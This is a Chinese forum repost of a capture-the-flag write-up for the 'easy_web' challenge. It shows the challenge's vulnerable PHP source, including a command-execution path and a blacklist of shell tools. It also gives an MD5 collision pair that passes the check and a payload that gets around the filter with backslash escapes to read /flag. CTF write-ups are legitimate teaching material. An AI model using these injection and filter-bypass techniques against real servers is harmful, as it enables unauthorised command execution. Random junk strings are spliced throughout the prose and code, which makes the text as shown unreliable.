飞雪团队

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 14926|回复: 0

[安洵杯 2019]easy_web

[复制链接]

8242

主题

8330

帖子

2万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
27056
发表于 2022-2-12 14:35:42 | 显示全部楼层 |阅读模式

3 J6 b8 m& Z5 G- Z8 F2 Z<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
5 `7 m3 \3 O- B: A2 R<p>&nbsp;</p>3 V! @$ C8 \9 o
<p>&nbsp;</p>) A9 F8 V/ z8 F: Q8 X! b
<p>&nbsp;题目打开如下,?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=,同时查看源代码</p>7 X' d# |* h% C% L: H! U
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>& l% F: }+ V' @5 H4 A, T2 t
<p>&nbsp;</p>& t; [9 G* J, w/ T8 X6 S
<p>&nbsp;</p>
! i) ?2 k6 g/ r6 j<p>这里有个MD5 is funny,说明这个题目大概率跟MD5有关</p>+ K. d) n. y* S, P8 E- ~
<p>然后我抓包了一下,消息头里面没有什么特殊的东西,于是我尝试从url入手</p>3 T9 n) ^3 M- q6 |1 b5 R
<p>首先把那个进行一次base64位解码</p>( u$ h$ r( G# b
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
: D/ H9 y% q. M0 m$ v8 \6 p. p$ s<p>&nbsp;</p>
4 f/ X7 F& m2 i9 v<p>&nbsp;</p>
4 C, r) S7 Y+ ?<p>&nbsp;解码一次以后还是很像base64编码,于是又解码一次</p>
* o' x+ q: e- c! I0 k, o4 f<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>+ U* S/ i" K+ K6 E% L! a
<p>&nbsp;</p>- @4 @2 o0 l5 h
<p>&nbsp;</p># P! ^5 h2 T1 D5 b
<p>&nbsp;然后用hex解码一下得到了</p>
7 N" e4 C7 j* Q/ c% H* n<div class="cnblogs_Highlighter">8 P* I$ z  X+ B0 |2 J
<pre class="brush:sql;gutter:true;">555.png
4 b, S/ @* N& N8 Q0 |</pre>2 p3 L5 Z) r% Y$ d
</div>" u) T) u( R  a
<p>  用同样的方法把index.php进行加密</p>+ Y, ~! z) \5 N: z, g3 H
<div class="cnblogs_Highlighter">
$ j8 e, d6 t. d+ W8 O<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3& J# E  ^: t: ]" V4 w0 Y
</pre>2 o8 L, \; W9 @9 s5 b; p' y$ I; O
</div>
9 f- y, O+ ?! M* r  b; X<p>  然后输入到地址栏</p>
, s/ E$ ]" ]# L+ n8 z7 j<p>&nbsp;然后查看源代码,把源代码里面的那一串base64的编码解码</p>
# C3 a' x& i) I7 E8 _# n- c<div class="cnblogs_code">) }/ E1 v- P8 Q6 E( b
<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
- P6 s+ s, [; s' N+ q</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);. C* J' y3 [" e
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
4 E" \" j- y( q# g</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
  S" Y, S, \6 _7 W! _( D% H1 D. h5 W# e</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
1 [, z/ p* ]% f5 U) i- L, \; L    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);8 \, q* q! I! b& k# R( X2 u
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));
1 X* x: V1 x! O2 M0 o! ~/ n4 s" F& T" R. }/ A. ~/ `+ ^
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
+ G% j; d, L6 f  A6 a0 w. x</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {& l* K! k! O) G
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;' }7 T. J. B4 w9 l8 m
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi~ no flag"<span style="color: rgba(0, 0, 0, 1)">);, n6 [- E8 N0 S( F$ P8 {
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {8 _! H6 j9 f" c" S4 T6 ]
    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
9 d* l" m  C/ S6 Y3 j6 {$ [) n    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;8 O$ q: K+ C; E8 Y! ~  D
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;6 C' A% B$ E" K# }$ s8 r, k
}  w9 Y) @. r% T8 r
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
2 a# y. Z8 [! z</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
& l' W3 V1 f1 }  A: z</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
& r  h8 f( w( H    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);" t# W3 D  h8 g3 D
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;& t: Q& K  U8 w+ @
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {7 U: Z9 @! a' P! i5 K4 ?
    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {( ~5 a% l2 [9 l
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;0 U5 v; s7 I4 i0 q6 q
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
4 L2 O0 i4 Q- k/ x  O; T9 {5 Y        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);+ w- [. h; C1 k& L
    }
: W9 B$ {1 I6 K3 t# ?; c; \0 c}' e4 D: @+ t  F: w
  t/ V; g( [9 I) R9 g, T
</span>?&gt;
9 ?3 b9 S$ ~) E' R. g  v* l. [&lt;html&gt;
1 p6 R, g) D' p- U1 e&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
3 I$ V6 ]* _& R9 k- [; A, u  body{& j3 B3 L  t; c# O. p
   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
2 ^; s1 }0 d- g8 y   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;! p/ B7 T2 p. q6 x7 N% T9 \
   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;$ F' B) R4 i2 E' \/ y1 n% }
   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>- {; Y$ b& L+ U- _- m9 O
<span style="color: rgba(0, 0, 0, 1)">}3 A% W; v2 Q' Q6 P
</span>&lt;/style&gt;9 [: M% H& p3 m! c% d# x* l6 d
&lt;body&gt;
) l( L, o5 q5 A# A9 r0 L. T9 ?+ ?7 Q&lt;/body&gt;
6 N. ?0 }* P5 [&lt;/html&gt;</pre>& y0 ^3 T8 q& f
</div>
* G6 i8 m  z( z$ \. _3 a<p>结合前面的推断,关键代码就在</p>% A. Y+ b$ e" k& G' A
<div class="cnblogs_code">* W8 [4 e0 Y2 z' b% `) w
<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
, K% h; J1 t& u1 k; }# {; a        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;  \$ q+ G) S/ a% G+ ~* u: X
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {' F6 r% q7 C5 A: `
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
* ^# p6 p( T7 B    }</span></pre>7 ?1 U2 q9 Z7 U* r
</div>
7 D$ x; b" S6 x/ {( ^<p>这种MD5是md5强碰撞</p>
+ i" }* \  W% Y<div class="cnblogs_Highlighter">( \; a* z  j' `" X  [$ A
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a22 U% a4 t5 R. B) c. V+ M
</pre>" W% S* ?7 ^2 a  ~: z1 h  C
</div>
( \, Y  O3 H  y: {) X<div class="cnblogs_Highlighter">, S% k  m# c! U. n, t: W
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
  B! w8 ], V) ?* ?2 |</pre>
) \9 @- }+ C: g0 ~" m</div>$ k7 o3 E& C" V5 G8 L4 x8 R: K+ b
<p>  只需要这样就可以把cmd里面的当成命令来处理。</p>
% Z9 p5 Y- @; Z% k5 [; N  S<p>于是采用payload:</p>0 D2 a9 Z% R1 l; @3 z1 ~, g- m, T7 x
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>! \* w9 M' W7 m
<p>&nbsp;</p>3 Q0 T3 H2 y1 p  Z8 J" {+ b# `
<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
. n' w. C8 m2 ^+ i<p>ls和l\s在命令执行的时候结果是一样的。</p>( v/ w" C0 c3 A$ T1 O3 f
<p>然后发现根目录里面有/flag</p>
' }. h  N( R' y<p>于是payload:</p>
& x; d% ?$ o, h) O* g% Y  |<div class="cnblogs_Highlighter">
& \2 [& O3 T1 l/ ]- i# U% ]<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
/ O3 @" s1 \4 W</pre>8 k! N5 y( a) s4 L, U; f6 d! G
</div>
- Q5 _# m& U% L8 Q<p>  对于这个题目,因为他没有屏蔽sort和dir</p>$ d& T3 l+ U: ]4 k3 w
<p>所以查看也可以用dir来代替ls,cat可以用sort来代替。</p>
- N% ~6 I0 h! g" _# g+ V<p>&nbsp;</p>
9 \7 Y; K4 W/ N- S: H( U
回复

使用道具 举报

懒得打字嘛,点击右侧快捷回复 【右侧内容,后台自定义】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|飞雪团队

GMT+8, 2026-2-26 23:43 , Processed in 0.128505 second(s), 22 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表